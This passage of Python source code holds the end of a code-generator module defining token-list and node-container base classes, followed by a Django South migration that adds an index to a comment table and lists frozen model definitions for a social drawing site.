do not build a new one\n self[:] = []\n\n def insert(self, index, value):\n elem_list = listify(value)\n for i, elem in enumerate(elem_list):\n if not isinstance(elem, self.node_classinfo):\n elem = self.node_factory(elem)\n self.node_list.insert(index+i, elem)\n\n\n def index(self, *args, **kwargs):\n return self.node_list.index(*args, **kwargs)\n\n def count(self, *args, **kwargs):\n return self.node_list.count(*args, **kwargs)\n\n def pop(self, *args, **kwargs):\n return self.node_list.pop(*args, **kwargs)\n\n def reverse(self):\n self.node_list.reverse()\n\n def remove(self, *args, **kwargs):\n self.node_list.remove(*args, **kwargs)\n\n @abc.abstractmethod\n def __add__(self, other):\n return type(self)((self, other))\n\n @abc.abstractmethod\n def __radd__(self, other):\n return type(self)((other, self))\n\n def __iadd__(self, other):\n other_list = listify(other)\n typed_other_list = [\n item if isinstance(item, self.node_classinfo) else self.node_factory(item)\n for item in other_list\n ]\n self.node_list.extend(typed_other_list)\n return self\n\n def append(self, other):\n self.__iadd__(other)\n\n def extend(self, other_list):\n other_list = listify(other_list)\n for other in other_list:\n self.append(other)\n\n def __mul__(self, other):\n if isinstance(other, numbers.Integral):\n self_copy = copy.copy(self)\n self_copy.node_list = self.node_list * other\n return self_copy\n else:\n return NotImplemented\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n def __imul__(self, other):\n if isinstance(other, numbers.Integral):\n self.node_list *= other\n return self\n else:\n return NotImplemented\n\n def __contains__(self, item):\n return item in self.node_list\n\n def __reversed__(self):\n return reversed(self.node_list)\n\n def __getitem__(self, key):\n return self.node_list[key]\n\n def __setitem__(self, key, value):\n if not isinstance(value, self.node_classinfo):\n value = self.node_factory(value)\n\n self.node_list[key] = value\n\n def __delitem__(self, key):\n del self.node_list[key]\n\n def __len__(self):\n return len(self.node_list)\n\n def __iter__(self):\n return iter(self.node_list)\n\n\nclass TokenListABC(NodeBase, NonIterable, collections.MutableSequence):\n """"""This class is an abstract base class for all classes that are token lists.\n\n A token list is an object that holds a sequence of tokens, which get concatenated when printed.\n The tokens are turned into strings only when the token list is printed, which is why it is\n the lazy building blocks of source code constructs like expressions and many others.\n\n Whan printed, the token list should call *inline_str* on its tokens if the token is a :class:`NodeABC`,\n or the builtin :func:`str` otherwise.\n """"""\n pass\n\nclass DelegatedTokenListBase(TokenListABC):\n """"""This is the base class for token lists classes that forward the calls to the :class:`TokenListABC` API\n to an attribute.\n\n This class implements stubs to allow transparent object composition.\n """"""\n @property\n def tokenlist_attr(self):\n """"""This property gives the attribute holding the real token list.""""""\n\n attr = getattr(self, self.tokenlist_attr_name)\n if not isinstance(attr, TokenListABC):\n raise AttributeError(\'The attribute \'+self.tokenlist_attr_name+\' is not a TokenListABC\')\n else:\n return attr\n\n @tokenlist_attr.setter\n def tokenlist_attr(self, value):\n return setattr(self, self.tokenlist_attr_name, value)\n\n def __init__(self, tokenlist_attr_name, *args, **kwargs):\n """"""\n :param tokenlist_attr_name: the name of the attribute holding the real token list\n """"""\n\n self.tokenlist_attr_name = tokenlist_attr_name\n super().__init__(*args, **kwargs)\n\n def inline_str(self, idt=None):\n return self.tokenlist_attr.inline_str(idt)\n\n def freestanding_str(self, idt=None):\n return self.tokenlist_attr.freestanding_str(idt)\n\n def index(self, *args, **kwargs):\n return self.tokenlist_attr.index(*args, **kwargs)\n\n def insert(self, *args, **kwargs):\n return self.tokenlist_attr.insert(*args, **kwargs)\n\n def index(self, *args, **kwargs):\n return self.tokenlist_attr.index(*args, **kwargs)\n\n def count(self, *args, **kwargs):\n return self.tokenlist_attr.count(*args, **kwargs)\n\n def pop(self, *args, **kwargs):\n return self.tokenlist_attr.pop(*args, **kwargs)\n\n def reverse(self):\n self.tokenlist_attr.reverse()\n\n def remove(self, *args, **kwargs):\n self.tokenlist_attr.remove(*args, **kwargs)\n\n def __add__(self, other):\n self_copy = copy.copy(self)\n self_copy.tokenlist_attr = self_copy.tokenlist_attr.__add__(other)\n return self_copy\n\n def __radd__(self, other):\n self_copy = copy.copy(self)\n self_copy.tokenlist_attr = self_copy.tokenlist_attr.__radd__(other)\n return self_copy\n\n def append(self, other):\n self.tokenlist_attr.append(other)\n\n def __iadd__(self, *args, **kwargs):\n self.tokenlist_attr.__iadd__(*args, **kwargs)\n return self\n\n def extend(self, other_list):\n self.tokenlist_attr.extend(other_list)\n\n def __mul__(self, other):\n self_copy = copy.copy(self)\n self_copy.tokenlist_attr = self_copy.tokenlist_attr.__mul__(other)\n return self_copy\n\n\n def __rmul__(self, *args, **kwargs):\n self_copy = copy.copy(self)\n self_copy.tokenlist_attr = self_copy.tokenlist_attr.__rmul__(*args, **kwargs)\n return self_copy\n\n\n def __imul__(self, other):\n self.tokenlist_attr.__imul__(other)\n return self\n\n def __contains__(self, *args, **kwargs):\n return self.tokenlist_attr.__contains__(*args, **kwargs)\n\n def __iter__(self):\n return self.tokenlist_attr.__iter__()\n\n def __reversed__(self):\n return self.tokenlist_attr.__reversed__()\n\n def __getitem__(self, key):\n return self.tokenlist_attr.__getitem__(key)\n\n def __setitem__(self, key, value):\n self.tokenlist_attr.__setitem__(key, value)\n\n def __delitem__(self, key):\n self.tokenlist_attr.__delitem__(key)\n\n def __len__(self):\n return self.tokenlist_attr.__len__()\n\n\nclass TokenListBase(TokenListABC):\n """"""This base class implements the :class:`TokenListABC` API with all of the operators overloading logic.\n """"""\n def __init__(self, token_list=None, *args, **kwargs):\n """"""\n :param token_list: the list of tokens to store inside the token list\n """"""\n self._token_list = listify(token_list)\n super().__init__(*args, **kwargs)\n\n def inline_str(self, idt=None):\n """"""Print the tokens of the token list usin, and concatenate all the strings.\n\n If the token is a :class:`NodeABC`, its *inline_str* method is used.\n otherwise, :func:`str` builtin is called on the token.\n """"""\n string = \'\'\n for token in self._token_list:\n if token is self:\n # Special handling of self: allows to print itself using\n # a different method to avoid infinite recursion and to provide\n # a mean to subclasses to implement self printing without creating a\n # ""self-printer"" class dedicated to printing themselves\n string += self.self_inline_str(idt)\n elif isinstance(token, NodeABC):\n string += token.inline_str(idt)\n else:\n string += str(token)\n\n return string\n\n def index(self, *args, **kwargs):\n return self._token_list.index(*args, **kwargs)\n\n def insert(self, *args, **kwargs):\n return self._token_list.insert(*args, **kwargs)\n\n def index(self, *args, **kwargs):\n return self._token_list.index(*args, **kwargs)\n\n def count(self, *args, **kwargs):\n return self._token_list.count(*args, **kwargs)\n\n def pop(self, *args, **kwargs):\n return self._token_list.pop(*args, **kwargs)\n\n def reverse(self):\n self._token_list.reverse()\n\n def remove(self, *args, **kwargs):\n self._token_list.remove(*args, **kwargs)\n\n def __add__(self, other):\n if isinstance(other, TokenListABC):\n other_list = list(other)\n self_copy = copy.copy(self)\n self_copy._token_list = self._token_list+other_list\n return self_copy\n # The result of the addition with a NodeContainer is a NodeContainer\n elif isinstance(other, NodeContainerBase):\n return other.__radd__(self)\n else:\n other_list = listify(other)\n self_copy = copy.copy(self)\n self_copy._token_list = self._token_list+other_list\n return self_copy\n\n def __radd__(self, other):\n other_list = listify(other)\n self_copy = copy.copy(self)\n self_copy._token_list = other_list+self._token_list\n return self_copy\n\n def append(self, other):\n if isinstance(other, TokenListABC):\n other_list = tuple(other)\n else:\n other_list = listify(other)\n\n self._token_list.extend(other_list)\n return self\n\n def __iadd__(self, *args, **kwargs):\n self.append(*args, **kwargs)\n return self\n\n def extend(self, other_list):\n other_list = listify(other_list)\n for other in other_list:\n self.append(other)\n\n def __mul__(self, other):\n if isinstance(other, numbers.Integral):\n self_copy = copy.copy(self)\n self_copy._token_list = self._token_list * other\n return self_copy\n else:\n return NotImplemented\n\n def __rmul__(self, *args, **kwargs):\n return self.__mul__(*args, **kwargs)\n\n def __imul__(self, other):\n if isinstance(other, numbers.Integral):\n self._token_list *= other\n return self\n else:\n return NotImplemented\n\n def __contains__(self, *args, **kwargs):\n return self._token_list.__contains__(*args, **kwargs)\n\n def __iter__(self):\n return iter(self._token_list)\n\n def __reversed__(self):\n return reversed(self._token_list)\n\n def __getitem__(self, key):\n return self._token_list[key]\n\n def __setitem__(self, key, value):\n self._token_list[key] = value\n\n def __delitem__(self, key):\n del self._token_list[key]\n\n def __len__(self):\n return len(self._token_list)\n\n\nclass _IndentedTokenListBase:\n """"""This class is the base class that implements a token list which indents its content when printed.""""""\n def inline_str(self, idt=None):\n idt = Indentation.ensure_idt(idt)\n\n snippet = super().inline_str(idt)\n indented_new_line = ""\\n""+str(idt)\n snippet = snippet.replace(""\\n"", indented_new_line)\n return snippet\n\nclass IndentedTokenListBase(_IndentedTokenListBase, TokenListBase):\n """"""This class is a base class for token lists that indent their content when printed.""""""\n pass\n\nclass IndentedDelegatedTokenListBase(_IndentedTokenListBase, DelegatedTokenListBase):\n """"""This is a mix between :class:`DelegatedTokenListBase` and :class:`IndentedTokenListBase`.""""""\n pass\n\nclass BacktraceBase(TokenListBase, NonIterable, metaclass=abc.ABCMeta):\n """"""This base class allows the instances to record the backtrace of the Python code that\n created them.\n\n This allows one to add comments in generated source code showing which file and line of the Python\n script was responsible for creating it. This is a facility when debugging the source code generator,\n and can avoid headache when ones want to track down which line of Python generated which line of\n generated source code.\n As a convenience, it is a subclass of :class:`TokenListBase` so it can be used inside a comment for example.\n """"""\n __frame_format_string = \'{filename}:{lineno}({function})\'\n __frame_joiner = \', \'\n\n def __init__(self, level=0, *args, **kwargs):\n stack = inspect.stack()\n self.stack_frame_list = [\n frame[1:] for frame in stack\n if os.path.dirname(frame[1]) != os.path.dirname(__file__)\n ]\n\n super().__init__(self, *args, **kwargs)\n\n @abc.abstractmethod\n def freestanding_str(self, idt=None):\n #Construct a comment by giving itself as a token and use its freestanding_str method\n pass\n\n def self_inline_str(self, idt=None):\n return self.__frame_joiner.join(\n self.__frame_format_string.format(\n filename = os.path.relpath(frame[0]),\n lineno = frame[1],\n function = frame[2],\n line_content = frame[3][frame[4]] if frame[3] is not None else \'\'\n ) for frame in self.stack_frame_list\n )\n', '# -*- coding: utf-8 -*-\nimport datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n db.execute(""create index canvas_comment_id_and_visibility_and_parent_comment_id on canvas_comment (id, visibility, parent_comment_id);"")\n\n def backwards(self, orm):\n raise RuntimeError(""Cannot reverse this migration."") \n\n models = {\n \'auth.group\': {\n \'Meta\': {\'object_name\': \'Group\'},\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'name\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'80\'}),\n \'permissions\': (\'django.db.models.fields.related.ManyToManyField\', [], {\'to\': ""orm[\'auth.Permission\']"", \'symmetrical\': \'False\', \'blank\': \'True\'})\n },\n \'auth.permission\': {\n \'Meta\': {\'ordering\': ""(\'content_type__app_label\', \'content_type__model\', \'codename\')"", \'unique_together\': ""((\'content_type\', \'codename\'),)"", \'object_name\': \'Permission\'},\n \'codename\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'100\'}),\n \'content_type\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'contenttypes.ContentType\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'name\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'50\'})\n },\n \'auth.user\': {\n \'Meta\': {\'object_name\': \'User\'},\n \'date_joined\': (\'django.db.models.fields.DateTimeField\', [], {\'default\': \'datetime.datetime.now\'}),\n \'email\': (\'django.db.models.fields.EmailField\', [], {\'max_length\': \'254\', \'blank\': \'True\'}),\n \'first_name\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'30\', \'blank\': \'True\'}),\n \'groups\': (\'django.db.models.fields.related.ManyToManyField\', [], {\'to\': ""orm[\'auth.Group\']"", \'symmetrical\': \'False\', \'blank\': \'True\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'is_active\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'True\'}),\n \'is_staff\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'is_superuser\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'last_login\': (\'django.db.models.fields.DateTimeField\', [], {\'default\': \'datetime.datetime.now\'}),\n \'last_name\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'30\', \'blank\': \'True\'}),\n \'password\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'128\'}),\n \'user_permissions\': (\'django.db.models.fields.related.ManyToManyField\', [], {\'to\': ""orm[\'auth.Permission\']"", \'symmetrical\': \'False\', \'blank\': \'True\'}),\n \'username\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'30\'})\n },\n \'canvas.apiapp\': {\n \'Meta\': {\'object_name\': \'APIApp\'},\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'name\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'255\'})\n },\n \'canvas.apiauthtoken\': {\n \'Meta\': {\'unique_together\': ""((\'user\', \'app\'),)"", \'object_name\': \'APIAuthToken\'},\n \'app\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.APIApp\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'token\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'40\'}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.bestof\': {\n \'Meta\': {\'object_name\': \'BestOf\'},\n \'category\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'best_of\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'canvas.Category\']""}),\n \'chosen_by\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']""}),\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'best_of\'"", \'to\': ""orm[\'canvas.Comment\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {})\n },\n \'canvas.category\': {\n \'Meta\': {\'object_name\': \'Category\'},\n \'description\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'140\'}),\n \'founded\': (\'django.db.models.fields.FloatField\', [], {\'default\': \'1298956320\'}),\n \'founder\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'founded_groups\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'auth.User\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'moderators\': (\'django.db.models.fields.related.ManyToManyField\', [], {\'related_name\': ""\'moderated_categories\'"", \'symmetrical\': \'False\', \'to\': ""orm[\'auth.User\']""}),\n \'name\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'20\'}),\n \'visibility\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'0\'})\n },\n \'canvas.comment\': {\n \'Meta\': {\'object_name\': \'Comment\'},\n \'anonymous\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'author\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'comments\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'auth.User\']""}),\n \'category\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'comments\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'canvas.Category\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'ip\': (\'django.db.models.fields.IPAddressField\', [], {\'default\': ""\'127.0.0.1\'"", \'max_length\': \'15\'}),\n \'judged\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'ot_hidden\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'parent_comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'replies\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'canvas.Comment\']""}),\n \'parent_content\': (\'django.db.models.fields.related.ForeignKey\', [], {\'blank\': \'True\', \'related_name\': ""\'comments\'"", \'null\': \'True\', \'to\': ""orm[\'canvas.Content\']""}),\n \'posted_on_quest_of_the_day\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'replied_comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'to\': ""orm[\'canvas.Comment\']"", \'null\': \'True\', \'blank\': \'True\'}),\n \'reply_content\': (\'django.db.models.fields.related.ForeignKey\', [], {\'blank\': \'True\', \'related_name\': ""\'used_in_comments\'"", \'null\': \'True\', \'to\': ""orm[\'canvas.Content\']""}),\n \'reply_text\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'2000\', \'blank\': \'True\'}),\n \'score\': (\'django.db.models.fields.FloatField\', [], {\'default\': \'0\', \'db_index\': \'True\'}),\n \'skip_moderation\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'star_count\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'0\', \'blank\': \'True\'}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {\'default\': \'0\'}),\n \'title\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'140\', \'blank\': \'True\'}),\n \'visibility\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'0\'})\n },\n \'canvas.commentflag\': {\n \'Meta\': {\'object_name\': \'CommentFlag\'},\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'flags\'"", \'to\': ""orm[\'canvas.Comment\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'ip\': (\'django.db.models.fields.IPAddressField\', [], {\'max_length\': \'15\'}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'type_id\': (\'django.db.models.fields.IntegerField\', [], {}),\n \'undone\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\', \'db_index\': \'True\'}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'flags\'"", \'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.commentmoderationlog\': {\n \'Meta\': {\'object_name\': \'CommentModerationLog\'},\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.Comment\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'moderator\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']"", \'null\': \'True\'}),\n \'note\': (\'django.db.models.fields.TextField\', [], {}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'moderated_comments_log\'"", \'to\': ""orm[\'auth.User\']""}),\n \'visibility\': (\'django.db.models.fields.IntegerField\', [], {})\n },\n \'canvas.commentpin\': {\n \'Meta\': {\'object_name\': \'CommentPin\'},\n \'auto\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.Comment\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.commentsticker\': {\n \'Meta\': {\'object_name\': \'CommentSticker\'},\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'stickers\'"", \'to\': ""orm[\'canvas.Comment\']""}),\n \'epic_message\': (\'django.db.models.fields.CharField\', [], {\'default\': ""\'\'"", \'max_length\': \'140\', \'blank\': \'True\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'ip\': (\'django.db.models.fields.IPAddressField\', [], {\'max_length\': \'15\'}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'type_id\': (\'django.db.models.fields.IntegerField\', [], {}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'to\': ""orm[\'auth.User\']"", \'null\': \'True\', \'blank\': \'True\'})\n },\n \'canvas.commentstickerlog\': {\n \'Meta\': {\'object_name\': \'CommentStickerLog\'},\n \'comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.Comment\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.content\': {\n \'Meta\': {\'object_name\': \'Content\'},\n \'alpha\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'animated\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'id\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'40\', \'primary_key\': \'True\'}),\n \'ip\': (\'django.db.models.fields.IPAddressField\', [], {\'default\': ""\'127.0.0.1\'"", \'max_length\': \'15\'}),\n \'remix_of\': (\'django.db.models.fields.related.ForeignKey\', [], {\'blank\': \'True\', \'related_name\': ""\'remixes\'"", \'null\': \'True\', \'to\': ""orm[\'canvas.Content\']""}),\n \'remix_text\': (\'django.db.models.fields.CharField\', [], {\'default\': ""\'\'"", \'max_length\': \'1000\', \'blank\': \'True\'}),\n \'source_url\': (\'django.db.models.fields.CharField\', [], {\'default\': ""\'\'"", \'max_length\': \'4000\', \'blank\': \'True\'}),\n \'stamps_used\': (\'django.db.models.fields.related.ManyToManyField\', [], {\'symmetrical\': \'False\', \'related_name\': ""\'used_as_stamp\'"", \'blank\': \'True\', \'to\': ""orm[\'canvas.Content\']""}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'url_mapping\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.ContentUrlMapping\']"", \'null\': \'True\', \'blank\': \'True\'}),\n \'visibility\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'0\'})\n },\n \'canvas.contenturlmapping\': {\n \'Meta\': {\'object_name\': \'ContentUrlMapping\'},\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'})\n },\n \'canvas.emailunsubscribe\': {\n \'Meta\': {\'object_name\': \'EmailUnsubscribe\'},\n \'email\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'255\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'})\n },\n \'canvas.externalcontent\': {\n \'Meta\': {\'object_name\': \'ExternalContent\'},\n \'_data\': (\'django.db.models.fields.TextField\', [], {\'default\': ""\'{}\'""}),\n \'content_type\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'2\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'parent_comment\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'external_content\'"", \'to\': ""orm[\'canvas.Comment\']""}),\n \'source_url\': (\'django.db.models.fields.CharField\', [], {\'default\': ""\'\'"", \'max_length\': \'4000\', \'null\': \'True\', \'blank\': \'True\'})\n },\n \'canvas.facebookinvite\': {\n \'Meta\': {\'object_name\': \'FacebookInvite\'},\n \'fb_message_id\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'255\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'invited_fbid\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'255\'}),\n \'invitee\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'facebook_invited_from\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'auth.User\']""}),\n \'inviter\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'facebook_sent_invites\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.facebookuser\': {\n \'Meta\': {\'object_name\': \'FacebookUser\'},\n \'email\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'255\'}),\n \'fb_uid\': (\'django.db.models.fields.BigIntegerField\', [], {\'unique\': \'True\'}),\n \'first_name\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'255\'}),\n \'gender\': (\'django.db.models.fields.PositiveSmallIntegerField\', [], {\'default\': \'0\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'last_invited\': (\'canvas.util.UnixTimestampField\', [], {\'default\': \'0\'}),\n \'last_name\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'255\'}),\n \'user\': (\'django.db.models.fields.related.OneToOneField\', [], {\'to\': ""orm[\'auth.User\']"", \'unique\': \'True\', \'null\': \'True\', \'blank\': \'True\'})\n },\n \'canvas.followcategory\': {\n \'Meta\': {\'unique_together\': ""((\'user\', \'category\'),)"", \'object_name\': \'FollowCategory\'},\n \'category\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'followers\'"", \'to\': ""orm[\'canvas.Category\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'related_name\': ""\'following\'"", \'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.invitecode\': {\n \'Meta\': {\'object_name\': \'InviteCode\'},\n \'code\': (\'django.db.models.fields.CharField\', [], {\'unique\': \'True\', \'max_length\': \'32\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'invitee\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'invited_from\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'auth.User\']""}),\n \'inviter\': (\'django.db.models.fields.related.ForeignKey\', [], {\'default\': \'None\', \'related_name\': ""\'sent_invites\'"", \'null\': \'True\', \'blank\': \'True\', \'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.remixplugin\': {\n \'Meta\': {\'object_name\': \'RemixPlugin\'},\n \'author\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'s3md5\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'255\'}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {\'default\': \'0\'})\n },\n \'canvas.stashcontent\': {\n \'Meta\': {\'object_name\': \'StashContent\'},\n \'content\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.Content\']""}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'user\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']""})\n },\n \'canvas.userinfo\': {\n \'Meta\': {\'object_name\': \'UserInfo\'},\n \'avatar\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.Content\']"", \'null\': \'True\'}),\n \'bio_text\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'2000\', \'blank\': \'True\'}),\n \'enable_timeline\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'True\'}),\n \'enable_timeline_posts\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'facebook_id\': (\'django.db.models.fields.CharField\', [], {\'max_length\': \'100\', \'null\': \'True\', \'blank\': \'True\'}),\n \'follower_count\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'0\', \'blank\': \'True\'}),\n \'free_invites\': (\'django.db.models.fields.IntegerField\', [], {\'default\': \'10\'}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'invite_bypass\': (\'django.db.models.fields.CharField\', [], {\'default\': ""\'\'"", \'max_length\': \'255\', \'blank\': \'True\'}),\n \'is_qa\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'post_anonymously\': (\'django.db.models.fields.BooleanField\', [], {\'default\': \'False\'}),\n \'profile_image\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'canvas.Comment\']"", \'null\': \'True\'}),\n \'trust_changed\': (\'canvas.util.UnixTimestampField\', [], {\'null\': \'True\', \'blank\': \'True\'}),\n \'trusted\': (\'django.db.models.fields.NullBooleanField\', [], {\'null\': \'True\', \'blank\': \'True\'}),\n \'user\': (\'django.db.models.fields.related.OneToOneField\', [], {\'to\': ""orm[\'auth.User\']"", \'unique\': \'True\'})\n },\n \'canvas.usermoderationlog\': {\n \'Meta\': {\'object_name\': \'UserModerationLog\'},\n \'action\': (\'django.db.models.fields.IntegerField\', [], {}),\n \'id\': (\'django.db.models.fields.AutoField\', [], {\'primary_key\': \'True\'}),\n \'moderator\': (\'django.db.models.fields.related.ForeignKey\', [], {\'to\': ""orm[\'auth.User\']"", \'null\': \'True\'}),\n \'note\': (\'django.db.models.fields.TextField\', [], {}),\n \'timestamp\': (\'canvas.util.UnixTimestampField\', [], {}),\n \'user\': 